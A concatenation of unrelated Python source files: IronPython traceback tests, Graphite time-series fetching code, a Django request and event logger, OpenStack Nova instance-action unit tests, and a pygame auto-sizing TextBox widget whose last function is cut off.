assert_traceback([(LINE220+3, 0, FILE, 'test_throw_while_yield')])
def generator_yield_inside_try():
try:
yield 1
yield 2
_raise_exception()
except NameError:
pass
LINE230 = 211
def test_yield_inside_try():
try:
for x in generator_yield_inside_try():
pass
except:
assert_traceback([(LINE230+3, 0, FILE, 'test_yield_inside_try'), (LINE230-5, 2, 'test_traceback.py', 'generator_yield_inside_try'), _retb])
LINE240 = 221
def test_throw_and_throw():
try:
_raise_exception()
except:
assert_traceback([(LINE240 + 2, 0, FILE, 'test_throw_and_throw'), _retb])
try:
_raise_exception()
except:
assert_traceback([(LINE240 + 6, 0, FILE, 'test_throw_and_throw'), _retb])
LINE250 = 233
def test_throw_in_another_file():
if is_cli: _f_file = path_combine(get_full_dir_name(testpath.public_testdir), 'foo.py')
else: _f_file = os.getcwd() + '\\foo.py'
write_to_file(_f_file, '''
def another_raise():
raise Exception()
''');
try:
import foo
foo.another_raise()
except:
assert_traceback([(LINE250 + 8, 0, FILE, 'test_throw_in_another_file'), (3, 0, _f_file.lower(), 'another_raise')])
finally:
nt.remove(_f_file)
class MyException(Exception): pass
Line260 = 250
def catch_MyException():
try:
_raise_exception()
except MyException:
assert_traceback([]) # UNREACABLE. THIS TRICK SIMPLIFIES THE CHECK
def test_catch_MyException():
try:
catch_MyException()
except:
assert_traceback([(Line260+8, 0, FILE, 'test_catch_MyException'), (Line260+2, 0, FILE, 'catch_MyException'), _retb])
Line263 = 263
@skip("silverlight")
def test_cp11923_first():
try:
_t_test = testpath.public_testdir + "\\cp11923.py"
write_to_file(_t_test, """def f():
x = 'something bad'
raise Exception(x)""")
import cp11923
for i in range(3):
try:
cp11923.f()
except:
assert_traceback([(Line263 + 11, 69, 'test_traceback.py', 'test_cp11923_first'), (3, 22, get_full_dir_name(_t_test).lower(), 'f')])
imp.reload(cp11923)
finally:
import nt
nt.unlink(_t_test)
###############################################################################
##TESTS BEYOND THIS POINT SHOULD NOT DEPEND ON LINE NUMBERS IN THIS FILE#######
###############################################################################
@skip("silverlight")
def test_cp11923_second():
import nt
import sys
old_path = [x for x in sys.path]
sys.path.append(nt.getcwd())
try:
#Test setup
_t_test = testpath.public_testdir + "\\cp11116_main.py"
write_to_file(_t_test, """import cp11116_a
try:
cp11116_a.a()
except:
pass
cp11116_a.a()
""")
_t_test_a = testpath.public_testdir + "\\cp11116_a.py"
write_to_file(_t_test_a, """def a():
raise None
""")
#Actual test
t_out, t_in, t_err = nt.popen3(sys.executable + " " + nt.getcwd() + r"\cp11116_main.py")
lines = t_err.readlines()
t_err.close()
t_out.close()
t_in.close()
#Verification
Assert("cp11116_main.py\", line 7, in" in lines[1], lines[1])
line_num = 3
if is_cli:
line_num -= 1
Assert(lines[line_num].rstrip().endswith("cp11116_a.py\", line 2, in a"), lines[line_num])
finally:
sys.path = old_path
nt.unlink(_t_test)
nt.unlink(_t_test_a)
Line331 = 332
def test_reraise():
def g():
f()
def f():
try:
raise Exception
except:
raise
try:
g()
except:
assert_traceback([(Line331+9, 0, 'test_traceback.py', 'test_reraise'), (Line331, 0, 'test_traceback.py', 'g'), (Line331+4, 0, 'test_traceback.py', 'f')])
def test_reraise_finally():
def g():
f()
def f():
try:
raise Exception
finally:
raise
try:
g()
except:
assert_traceback([(Line331+25, 30, 'test_traceback.py', 'test_reraise_finally'), (Line331+16, 3, 'test_traceback.py', 'g'), (Line331+22,13, 'test_traceback.py', 'f')])
Line361 = 361
def test_xafter_finally_raise():
def g():
raise Exception
def nop(): pass
def f():
try:
nop()
finally:
nop()
try:
g()
except Exception as e:
assert_traceback([(Line361+14, 30, 'test_traceback.py', 'f'), (Line361+3, 3, 'test_traceback.py', 'g')])
f()
Line381 = 381
def test_uncaught_exception_thru_try():
def baz():
raise StopIteration
def f():
try:
baz()
except TypeError:
pass
try:
f()
except:
assert_traceback([(Line381+11, 30, 'test_traceback.py', 'test_uncaught_exception_thru_try'), (Line381+7, 3, 'test_traceback.py', 'f'), (Line381+3, 3, 'test_traceback.py', 'baz')])
Line397=397
def test_with_traceback():
from _thread import allocate_lock
def f():
g()
def g():
h()
def h():
raise Exception('hello!!')
try:
with allocate_lock():
f()
except:
assert_traceback([(Line397+14, 30, 'test_traceback.py', 'test_with_traceback'),
(Line397+4, 3, 'test_traceback.py', 'f'),
(Line397+7, 3, 'test_traceback.py', 'g'),
(Line397+10, 3, 'test_traceback.py', 'h')])
Line419=419
def test_xraise_again():
def f():
g()
def g():
h()
def h():
raise Exception('hello!!')
try:
try:
f()
except Exception as e:
raise e
except:
assert_traceback([(Line419+15, 30, 'test_traceback.py', 'test_xraise_again'), ])
Line438=438
def test_with_traceback_enter_throws():
class ctx_mgr(object):
def __enter__(*args):
raise Exception('hello')
def __exit__(*args):
pass
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line438+13, 30, 'test_traceback.py', 'test_with_traceback_enter_throws'),
(Line438+4, 3, 'test_traceback.py', '__enter__')])
Line457=457
def test_with_traceback_exit_throws():
class ctx_mgr(object):
def __enter__(*args):
pass
def __exit__(*args):
raise Exception('hello')
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line457+13, 30, 'test_traceback.py', 'test_with_traceback_exit_throws'),
(Line457+6, 3, 'test_traceback.py', '__exit__')])
Line475=475
def test_with_traceback_ctor_throws():
class ctx_mgr(object):
def __init__(self):
raise Exception('hello')
def __enter__(*args):
pass
def __exit__(*args):
pass
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line475+14, 30, 'test_traceback.py', 'test_with_traceback_ctor_throws'),
(Line475+4, 3, 'test_traceback.py', '__init__')])
Line496=496
def test_with_mixed_stack():
"""tests a stack which is mixed w/ interpreted and non-interpreted frames
because f() has a loop in it"""
def a():
with xxx() as abc:
f()
def f():
for z in ():
pass
1/0
class xxx(object):
def __enter__(*args): pass
def __exit__(*args): pass
try:
a()
except:
assert_traceback([(Line496+19, 30, 'test_traceback.py', 'test_with_mixed_stack'),
(Line496+6, 3, 'test_traceback.py', 'a'),
(Line496+12, 3, 'test_traceback.py', 'f')])
run_test(__name__)
|
|
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
from collections import defaultdict
from structlog import get_logger
from ..utils import epoch
logger = get_logger()
class TimeSeries(list):
def __init__(self, name, start, end, step, values, consolidate='average'):
list.__init__(self, values)
self.name = name
self.start = start
self.end = end
self.step = step
self.consolidationFunc = consolidate
self.valuesPerPoint = 1
self.options = {}
self.pathExpression = name
def __eq__(self, other):
if isinstance(other, TimeSeries):
color_eq = True
if hasattr(self, 'color'):
if hasattr(other, 'color'):
color_eq = (self.color == other.color)
else:
color_eq = False
elif hasattr(other, 'color'):
color_eq = False
return ((self.name, self.start, self.step, self.consolidationFunc,
self.valuesPerPoint, self.options) ==
(other.name, other.start, other.step,
other.consolidationFunc, other.valuesPerPoint,
other.options)) and list.__eq__(self, other) and color_eq
return False
def __iter__(self):
if self.valuesPerPoint > 1:
return self.__consolidatingGenerator(list.__iter__(self))
else:
return list.__iter__(self)
def consolidate(self, valuesPerPoint):
self.valuesPerPoint = int(valuesPerPoint)
def __consolidatingGenerator(self, gen):
buf = []
for x in gen:
buf.append(x)
if len(buf) == self.valuesPerPoint:
while None in buf:
buf.remove(None)
if buf:
yield self.__consolidate(buf)
buf = []
else:
yield None
while None in buf:
buf.remove(None)
if buf:
yield self.__consolidate(buf)
else:
yield None
return
def __consolidate(self, values):
usable = [v for v in values if v is not None]
if not usable:
return None
if self.consolidationFunc == 'sum':
return sum(usable)
if self.consolidationFunc == 'average':
return float(sum(usable)) / len(usable)
if self.consolidationFunc == 'max':
return max(usable)
if self.consolidationFunc == 'min':
return min(usable)
raise Exception(
"Invalid consolidation function: '%s'" % self.consolidationFunc)
def __repr__(self):
return 'TimeSeries(name=%s, start=%s, end=%s, step=%s)' % (
self.name, self.start, self.end, self.step)
class DataStore(object):
"""
Simple object to store results of multi fetches.
Also aids in looking up data by pathExpressions.
"""
def __init__(self):
self.paths = defaultdict(set)
self.data = defaultdict(list)
def get_paths(self, path_expr):
"""
Returns all paths found for path_expr
"""
return sorted(self.paths[path_expr])
def add_data(self, path, time_info, data, exprs):
"""
Stores data before it can be put into a time series
"""
# Dont add if empty
if not nonempty(data):
for d in self.data[path]:
if nonempty(d['values']):
return
# Add data to path
for expr in exprs:
self.paths[expr].add(path)
self.data[path].append({
'time_info': time_info,
'values': data
})
def get_series_list(self, path_expr):
series_list = []
for path in self.get_paths(path_expr):
for data in self.data.get(path):
start, end, step = data['time_info']
series = TimeSeries(path, start, end, step, data['values'])
series.pathExpression = path_expr
series_list.append(series)
return series_list
def fetchData(requestContext, pathExprs):
from ..app import app
startTime = int(epoch(requestContext['startTime']))
endTime = int(epoch(requestContext['endTime']))
if 'now' in requestContext:
now = int(epoch(requestContext['now']))
else:
now = None
# Convert to list if given single path
if not isinstance(pathExprs, list):
pathExprs = [pathExprs]
data_store = DataStore()
multi_nodes = defaultdict(list)
single_nodes = []
path_to_exprs = defaultdict(list)
# Group nodes that support multiple fetches
for pathExpr in pathExprs:
for node in app.store.find(pathExpr, startTime, endTime):
if not node.is_leaf:
continue
if node.path not in path_to_exprs:
if hasattr(node, '__fetch_multi__'):
multi_nodes[node.__fetch_multi__].append(node)
else:
single_nodes.append(node)
path_to_exprs[node.path].append(pathExpr)
# Multi fetches
for finder in app.store.finders:
if not hasattr(finder, '__fetch_multi__'):
continue
nodes = multi_nodes[finder.__fetch_multi__]
if not nodes:
continue
try:
time_info, series = finder.fetch_multi(nodes, startTime, endTime,
now, requestContext)
except TypeError:
time_info, series = finder.fetch_multi(nodes, startTime, endTime)
for path, values in series.items():
data_store.add_data(path, time_info, values,
path_to_exprs[path])
# Single fetches
fetches = [
(node.path, node.fetch(startTime, endTime, now, requestContext))
for node in single_nodes
]
for path, results in fetches:
if not results:
logger.info("no results", path=path, start=startTime,
end=endTime)
continue
try:
time_info, values = results
except ValueError as e:
raise Exception("could not parse timeInfo/values from metric "
"'%s': %s" % (path, e))
data_store.add_data(path, time_info, values, path_to_exprs[path])
return data_store
def nonempty(series):
for value in series:
if value is not None:
return True
return False
|
|
import traceback
import json
import requests
from .models import (
Log,
RequestLog,
EventLog,
)
class NoRequestException(Exception):
pass
class NoExceptionException(Exception):
pass
class ObjectLogger(object):
def log_request(self, log=None, request=None, request_body=None):
# -- General info
log.request_url = request.get_full_path()
log.request_method = request.method
log.get_data = json.dumps(request.GET)
log.request_body = request_body
log.cookies = json.dumps(request.COOKIES)
# --- Request meta info
log.meta = ','.join('"%s": "%s"' % (k, str(v)) for k, v in list(request.META.items()))
log.meta = '{%s}' % log.meta
log.meta = log.meta.replace('\\', '|')
# --- User info
if request.user and request.user.is_authenticated:
log.user_id = request.user.id
log.user_name = request.user.email
# --- User agent info
user_agent = request.user_agent
# Browser
log.request_browser = user_agent.browser
# OS
log.request_os = user_agent.os
# Device
log.request_device = user_agent.device
# Device type
log.is_mobile = user_agent.is_mobile
log.is_tablet = user_agent.is_tablet
log.is_touch_capable = user_agent.is_touch_capable
log.is_pc = user_agent.is_pc
log.is_bot = user_agent.is_bot
return log
def log_response(self, log, data, status=None, template_name=None, headers=None, content_type=None):
log.response_body = json.dumps(data)
log.response_status = status if status else 'None'
log.response_headers = json.dumps(headers)
log.response_content_type = content_type if content_type else 'None'
return log
def log_exception(self, log=None, exception=None):
# --- Exception info
log.exception_type = type(exception).__name__
log.message = str(exception)
log.stack_trace = traceback.format_exc()
return log
class Logger(object):
@staticmethod
def log_error(request=None, request_body=None, exception=None):
if request and exception:
log = Log(
log_level=Log.ERROR)
obj_logger = ObjectLogger()
log = obj_logger.log_exception(log, exception)
log = obj_logger.log_request(log, request, request_body)
# --- Save
log.save()
elif request is None:
raise NoRequestException('No http request found')
elif exception is None:
raise NoExceptionException('No exception found')
return log
@staticmethod
def log_debug(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.DEBUG,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def log_warn(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.WARN,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def log_info(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.INFO,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def non_request_log(log_level=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
# -- General info
log = Log(
log_level=log_level if log_level else Log.INFO,
message=message,
stack_trace=stack_trace)
# --- Save
log.save()
return log
class RequestObjectLogger(object):
def log_request(self, log, request, data):
# --- Request data
log.method = request.method
log.url = request.url
log.request_data = data if isinstance(data, str) else json.dumps(data)
headers = {val[0]: val[1] for val in list(request.headers.items())}
log.request_headers = json.dumps(headers)
return log
def log_response(self, log, response, user, message):
# --- Response data
log.response_text = response.text
log.response_status = response.status_code
log.response_reason = response.reason
log.response_time = response.elapsed.microseconds / 1000
# --- User data
if user:
if user.is_authenticated:
log.user_id = user.id
log.user_name = user.email
log.message = message if message else ''
return log
class RequestLogger(object):
@staticmethod
def get(url, params=None, user=None, message=None, **kwargs):
response = requests.get(url, params=params, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, params)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def post(url, data=None, json=None, user=None, message=None, **kwargs):
response = requests.post(url, data=data, json=None, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def put(url, data=None, json=None, user=None, message=None, **kwargs):
response = requests.put(url, data=data, json=None, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def delete(url, user=None, message=None, **kwargs):
response = requests.delete(url, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, None)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def patch(url, data=None, json=None, user=None, message=None, **kwargs):
response = requests.patch(url, data=data, json=None, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def head(url, user=None, message=None, **kwargs):
response = requests.head(url, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, None)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
class EventLogger(object):
@staticmethod
def _log_event(log_level, message, tag=''):
stack_trace = ''.join(line for line in traceback.format_stack())
log = EventLog(
log_level=log_level,
message=message,
stack_trace=stack_trace,
tag=tag)
log.save()
@staticmethod
def log_error(message, tag=''):
EventLogger._log_event(
log_level=EventLog.ERROR,
message=message,
tag=tag)
@staticmethod
def log_debug(message, tag=''):
EventLogger._log_event(
log_level=EventLog.DEBUG,
message=message,
tag=tag)
@staticmethod
def log_warn(message, tag=''):
EventLogger._log_event(
log_level=EventLog.WARN,
message=message,
tag=tag)
@staticmethod
def log_info(message, tag=''):
EventLogger._log_event(
log_level=EventLog.INFO,
message=message,
tag=tag)
|
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.compute import utils as compute_utils
from nova import db
from nova.objects import instance_action
from nova.openstack.common import timeutils
from nova.tests.objects import test_objects
NOW = timeutils.utcnow()
fake_action = {
'created_at': NOW,
'deleted_at': None,
'updated_at': None,
'deleted': False,
'id': 123,
'action': 'fake-action',
'instance_uuid': 'fake-uuid',
'request_id': 'fake-request',
'user_id': 'fake-user',
'project_id': 'fake-project',
'start_time': NOW,
'finish_time': None,
'message': 'foo',
}
fake_event = {
'created_at': NOW,
'deleted_at': None,
'updated_at': None,
'deleted': False,
'id': 123,
'event': 'fake-event',
'action_id': 123,
'start_time': NOW,
'finish_time': None,
'result': 'fake-result',
'traceback': 'fake-tb',
}
class _TestInstanceActionObject(object):
def test_get_by_request_id(self):
self.mox.StubOutWithMock(db, 'action_get_by_request_id')
db.action_get_by_request_id(self.context, 'fake-uuid', 'fake-request'
).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.get_by_request_id(
self.context, 'fake-uuid', 'fake-request')
self.assertEqual(fake_action['id'], action.id)
def test_action_start(self):
self.mox.StubOutWithMock(db, 'action_start')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action')
self.assertEqual(fake_action['id'], action.id)
def test_action_start_no_result(self):
self.mox.StubOutWithMock(db, 'action_start')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action', want_result=False)
self.assertEqual(None, action)
def test_action_finish(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_finish')
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_finish(
self.context, 'fake-uuid', want_result=True)
self.assertEqual(fake_action['id'], action.id)
def test_action_finish_no_result(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_finish')
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_finish(
self.context, 'fake-uuid', want_result=False)
self.assertEqual(None, action)
def test_finish(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_start')
self.mox.StubOutWithMock(db, 'action_finish')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action')
action.finish()
def test_get_list(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'actions_get')
actions = [dict(fake_action, id=1234),
dict(fake_action, id=5678)]
db.actions_get(self.context, 'fake-uuid').AndReturn(actions)
self.mox.ReplayAll()
action_list = instance_action.InstanceActionList.get_by_instance_uuid(
self.context, 'fake-uuid')
self.assertEqual(2, len(action_list))
for index, action in enumerate(action_list):
self.assertEqual(actions[index]['id'], action.id)
class TestInstanceActionObject(test_objects._LocalTest,
_TestInstanceActionObject):
pass
class TestRemoteInstanceActionObject(test_objects._RemoteTest,
_TestInstanceActionObject):
pass
class _TestInstanceActionEventObject(object):
def test_get_by_id(self):
self.mox.StubOutWithMock(db, 'action_event_get_by_id')
db.action_event_get_by_id(self.context, 'fake-id').AndReturn(
fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.get_by_id(self.context,
'fake-id')
self.assertEqual(fake_event['id'], event.id)
def test_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
self.context, 'fake-uuid', 'fake-event')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(self.context,
'fake-uuid',
'fake-event')
self.assertEqual(fake_event['id'], event.id)
def test_event_start_no_result(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
'fake-uuid', 'fake-event')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(
self.context, 'fake-uuid', 'fake-event', want_result=False)
self.assertEqual(None, event)
def test_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_start(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish(self.context,
'fake-uuid',
'fake-event')
self.assertEqual(fake_event['id'], event.id)
def test_event_finish_no_result(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_start(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish(
self.context, 'fake-uuid', 'fake-event', want_result=False)
self.assertEqual(None, event)
def test_event_finish_with_failure(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_start(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val='fake-exc',
exc_tb='fake-tb')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish_with_failure(
self.context, 'fake-uuid', 'fake-event', 'fake-exc', 'fake-tb')
self.assertEqual(fake_event['id'], event.id)
def test_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
self.context, 'fake-uuid', 'fake-event')).AndReturn(fake_event)
db.action_event_finish(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(
self.context, 'fake-uuid', 'fake-event')
event.finish()
def test_get_by_action(self):
self.mox.StubOutWithMock(db, 'action_events_get')
events = [dict(fake_event, id=1234),
dict(fake_event, id=5678)]
db.action_events_get(self.context, 'fake-action').AndReturn(events)
self.mox.ReplayAll()
event_list = instance_action.InstanceActionEventList.get_by_action(
self.context, 'fake-action')
self.assertEqual(2, len(event_list))
for index, event in enumerate(event_list):
self.assertEqual(events[index]['id'], event.id)
|
|
import pygame
all_sprites = pygame.sprite.Group()
class BaseWidget(pygame.sprite.Sprite):
def __init__(self, pos=(0, 0), size=(0, 0)):
super(BaseWidget, self).__init__()
self._rect = pygame.Rect(pos, size)
self._image = pygame.Surface(self._rect.size)
self.should_update = True
all_sprites.add(self)
@property
def rect(self):
return self._rect
@property
def image(self):
return self._image
def move_to(self, *pos):
setattr(self._rect, 'topleft', pos)
def move(self, *pos):
self._rect.move_ip(*pos)
def resize_to(self, *size):
self._rect.size = size
self._image = pygame.transform.scale(self._image, size)
def resize(self, *size):
self._rect.inflate(*size)
self._image = pygame.transform.scale(self._image, self._rect.size)
def unfocus(self):
pass
class TextBox(BaseWidget):
ATTRIBUTES = [
'anchor', 'background_color', 'border_color', 'border_size', 'font_name', 'font_size', 'image', 'padding',
'rect', 'text', 'text_color', 'wrap'
]
def __init__(
self, pos=(0, 0), size=(0, 0), text='', font_name='Arial', text_color=pygame.Color('black'),
anchor='topleft', padding=(0, 0), background_color=pygame.Color('white'), border_color=pygame.Color('grey'),
border_size=3, wrap=True
) -> None:
super().__init__(pos=pos, size=size)
# Colors.
self._text_color = text_color
self._background_color = background_color
self._border_color = border_color
# Text options.
self._anchor = anchor
self._padding = padding
self._wrap = wrap
# Pass.
self._border_size = border_size # In pixels.
self._text = text
self._font_name = font_name
# Dependent data.
self._text_area = self._image.get_rect(
size=(size[0] - border_size - padding[0] * 2, size[1] - border_size - padding[1] * 2),
)
self._text_area.center = self._image.get_rect().center
if text:
self._font_size, self._text_surface = self.get_text_surface_and_font_size()
self._font = pygame.font.SysFont(font_name, self._font_size)
else:
self._font_size = 256
self._font = pygame.font.SysFont(font_name, self._font_size)
self._text_surface = pygame.Surface((0, 0))
self._image.fill(background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def border_size(self):
return self._border_size
@border_size.setter
def border_size(self, value):
self._border_size = value
self.should_update = True
@property
def text(self):
return self._text
@text.setter
def text(self, value):
self._text = value
self.should_update = True
@property
def font_name(self):
return self._font_name
@font_name.setter
def font_name(self, value):
self._font_name = value
self.should_update = True
@property
def font_size(self):
return self._font_size
@font_size.setter
def font_size(self, value):
self._font_size = value
self.should_update = True
@property
def text_color(self):
return self._text_color
@text_color.setter
def text_color(self, value):
self._text_color = value
self.should_update = True
@property
def background_color(self):
return self._background_color
@background_color.setter
def background_color(self, background_color):
self._background_color = background_color
self._image.fill(background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def border_color(self):
return self._border_color
@border_color.setter
def border_color(self, border_color):
self._border_color = border_color
self._image.fill(self._background_color)
pygame.draw.rect(self._image, border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def anchor(self):
return self._anchor
@anchor.setter
def anchor(self, value):
self._anchor = value
self.should_update = True
@property
def padding(self):
return self._padding
@padding.setter
def padding(self, value):
self._padding = value
self.should_update = True
def get_text_surface_and_font_size(self, font_size=256):
size = self._text_area.size
font_name = self._font_name
font_color = self._text_color
bg_color = self._background_color
wrap = self._wrap
text_array = [word.split() for word in self._text.splitlines()]
SysFont = pygame.font.SysFont
rows = len(text_array)
appendable_rows = []
width, height = size
lower, upper = 0, font_size
found = False
while not found:
font = SysFont(font_name, font_size)
font_sizes = tuple(font.size(' '.join(row)) for row in text_array) # Font size (width, height) of each row.
text_width = max(size[0] for size in font_sizes)
text_height = font_sizes[0][1] * rows
if wrap:
# The surface cannot fit an exact font size so we'll return the lower of the two.
if upper - lower <= 1:
found = True
# Width exceed but height will fit one extra row.
elif text_width > width and text_height + text_height // rows <= height:
for row, x in enumerate(font_sizes):
if x[0] == text_width:
if len(text_array[row]) > 1:
if row + 1 in appendable_rows:
word = text_array[row].pop()
text_array[row + 1].insert(0, word)
else:
word = text_array[row].pop()
text_array.insert(row + 1, [word])
appendable_rows.append(row + 1)
rows += 1
else:
upper = font_size
font_size = (lower + upper) // 2
break
elif text_width > width or text_height > height:
upper = font_size
font_size = (lower + upper) // 2
elif text_width < width and text_height < height:
lower = font_size
font_size = (lower + upper) // 2
else:
found = True
else:
# The surface cannot fit an exact font size so we'll return the lower of the two.
if font_size == lower or font_size == upper:
found = True
elif text_width < width and text_height < height:
lower = font_size
font_size = (lower + upper) // 2
elif text_width > width or text_height > height:
upper = font_size
font_size = (lower + upper) // 2
else:
found = True
return_surface = pygame.Surface(size)
return_surface.fill(bg_color)
h = height // rows
for row, text_row in enumerate(text_array):
sub_surface = pygame.font.SysFont(font_name, lower).render(' '.join(text_row), 1, font_color)
rect = self._text_area.copy()
rect.height = h
rect.topleft = (0, h * row)
pos = sub_surface.get_rect()
setattr(pos, self._anchor, getattr(rect, self._anchor))
return_surface.blit(sub_surface, pos)
return lower, return_surface
# def _update_text_area(self):
# text_array = [word.split() for word in self._text.splitlines()]
# rows = len(text_array)
# height = self._text_area.height
#
# h = height // rows
# for row, text_row in enumerate(text_array):
# sub_surface = self._font.render(' '.join(text_row), 1, self._text_color)
# rect = self._text_area.copy()
# rect.height = h
# rect.topleft = (0, h * row)
# pos = sub_surface.get_rect()
# setattr(pos, self._anchor, getattr(rect, self._anchor))
# self._text_surface.blit(sub_surface, pos)
# self._image.blit(self._text_surface, self._text_area)
def update(self):
if self.should_update:
# update_whole_image
self._text_area = self._image.get_rect(
size=(self._rect.size[0] - self._border_size - self._padding[0] * 2,
self._rect.size[1] - self._border_size - self._padding[1] * 2)
)
self._text_area.center = self._image.get_rect().center
if self._text:
self._font_size, self._text_surface = self.get_text_surface_and_font_size()
self._font = pygame.font.SysFont(self._font_name, self._font_size)
else:
self._font_size = 1
self._font = pygame.font.SysFont(self._font_name, self._font_size)
self._text_surface = pygame.Surface((0, 0))
self._image.fill(self._background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
self.should_update = False
def __repr__(self):
attributes = sorted(self.ATTRIBUTES)
values = []
for attribute in attributes:
if attribute in self.__dict__:
values.append(getattr(self, attribute))
else:
values.append(getattr(self, '_' + attribute))
return '{}: \n{}\n'.format(
self.__class__.__name__, '\n'.join('\t{} = {!r}'.format(name, value) for name, value in zip(attributes, values))
)
def wrap_text(text, font):
text_array = [word.split() for word in text.splitlines()]
rows = len(text_array)
appendable_rows = []
width, height = size
